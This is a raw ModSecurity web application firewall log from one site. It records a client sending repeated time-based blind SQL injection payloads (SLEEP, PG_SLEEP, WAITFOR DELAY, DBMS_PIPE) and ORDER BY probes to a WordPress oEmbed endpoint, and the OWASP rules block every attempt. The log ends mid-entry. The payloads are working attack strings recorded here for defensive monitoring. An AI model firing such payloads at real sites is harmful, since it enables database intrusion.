"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/ AND SLEEP(5)-- szzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lm0MD5oChETZltkVQAAAABU"] [Thu Aug 15 03:21:43.562869 2024] [:error] [pid 31335:tid 139653931849472] [client 141.98.81.52:56656] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/) AND 6671=(SELECT 6671 FROM PG_SLEEP(5)) AND (3364=3364"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26l20MD5oChETZltkVQQAAAAg"] [Thu Aug 15 03:21:43.953091 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:56658] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/ AND 6671=(SELECT 6671 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26l3xeJlWfH1pdny5XDgAAAMk"] [Thu Aug 15 03:21:44.305027 2024] [:error] [pid 31337:tid 139653814351616] [client 141.98.81.52:56660] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/') AND 6671=(SELECT 6671 FROM PG_SLEEP(5)) AND ('OeRK'='OeRK"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mOwCyyCVFXh0DMS2awAAAJY"] [Thu Aug 15 03:21:44.586988 2024] [:error] [pid 31519:tid 139653822744320] [client 141.98.81.52:56662] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/' AND 6671=(SELECT 6671 FROM PG_SLEEP(5)) AND 'kEdT'='kEdT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mHxeJlWfH1pdny5XDwAAANU"] [Thu Aug 15 03:21:44.829882 2024] [:error] [pid 31337:tid 139653831137024] [client 141.98.81.52:56664] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/%' AND 6671=(SELECT 6671 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mOwCyyCVFXh0DMS2bAAAAJQ"] [Thu Aug 15 03:21:45.074622 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:56666] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/ AND 6671=(SELECT 6671 FROM PG_SLEEP(5))-- XpMI"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mXxeJlWfH1pdny5XEAAAANY"] [Thu Aug 15 03:21:45.321328 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:56668] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/) WAITFOR DELAY '0:0:5' AND (7040=7040"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mXxeJlWfH1pdny5XEQAAAMs"] [Thu Aug 15 03:21:45.565600 2024] [:error] [pid 31335:tid 139653889885952] [client 141.98.81.52:56670] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/ WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mW0MD5oChETZltkVQgAAAA0"] [Thu Aug 15 03:21:45.918831 2024] [:error] [pid 31335:tid 139653847922432] [client 141.98.81.52:56672] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/') WAITFOR DELAY '0:0:5' AND ('hdLa'='hdLa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mW0MD5oChETZltkVQwAAABI"] [Thu Aug 15 03:21:46.245077 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:56674] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/' WAITFOR DELAY '0:0:5' AND 'AOgl'='AOgl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mnxeJlWfH1pdny5XEgAAAM0"] [Thu Aug 15 03:21:46.656055 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:56676] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/%' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26mnxeJlWfH1pdny5XEwAAAMI"] [Thu Aug 15 03:21:47.069623 2024] [:error] [pid 31337:tid 139654049679104] [client 141.98.81.52:56678] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/ WAITFOR DELAY '0:0:5'-- DEZd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26m-wCyyCVFXh0DMS2bQAAAII"] [Thu Aug 15 03:21:47.478609 2024] [:error] [pid 31337:tid 139653915064064] [client 141.98.81.52:56680] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/) AND 3298=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(70)||CHR(68)||CHR(77),5) AND (8412=8412"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26m-wCyyCVFXh0DMS2bgAAAIo"] [Thu Aug 15 03:21:47.813624 2024] [:error] [pid 31336:tid 139653873100544] [client 141.98.81.52:56682] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/ AND 3298=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(70)||CHR(68)||CHR(77),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26m0PAyXqJhbW53WyPQAAAAE8"] [Thu Aug 15 03:21:48.242496 2024] [:error] [pid 31336:tid 139653931849472] [client 141.98.81.52:56684] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/') AND 3298=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(70)||CHR(68)||CHR(77),5) AND ('Ucjw'='Ucjw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26nEPAyXqJhbW53WyPQQAAAEg"] [Thu Aug 15 03:21:48.536931 2024] [:error] [pid 31337:tid 139654024500992] [client 141.98.81.52:56686] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/' AND 3298=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(70)||CHR(68)||CHR(77),5) AND 'ycsF'='ycsF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26nOwCyyCVFXh0DMS2bwAAAIU"] [Thu Aug 15 03:21:48.826132 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:56688] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/%' AND 3298=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(70)||CHR(68)||CHR(77),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26nHxeJlWfH1pdny5XFAAAAMc"] [Thu Aug 15 03:21:49.382021 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:56690] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/ AND 3298=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(70)||CHR(68)||CHR(77),5)-- ntDd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26nXxeJlWfH1pdny5XFQAAAMM"] [Thu Aug 15 03:21:50.177287 2024] [:error] [pid 31519:tid 139654032893696] [client 141.98.81.52:56692] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/) ORDER BY 1-- bqlh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26nnxeJlWfH1pdny5XFgAAAMQ"] [Thu Aug 15 03:21:50.782522 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56694] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26nnxeJlWfH1pdny5XFwAAANc"] [Thu Aug 15 03:21:51.292743 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:56696] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26n3xeJlWfH1pdny5XGAAAANI"] [Thu Aug 15 03:21:51.723636 2024] [:error] [pid 31337:tid 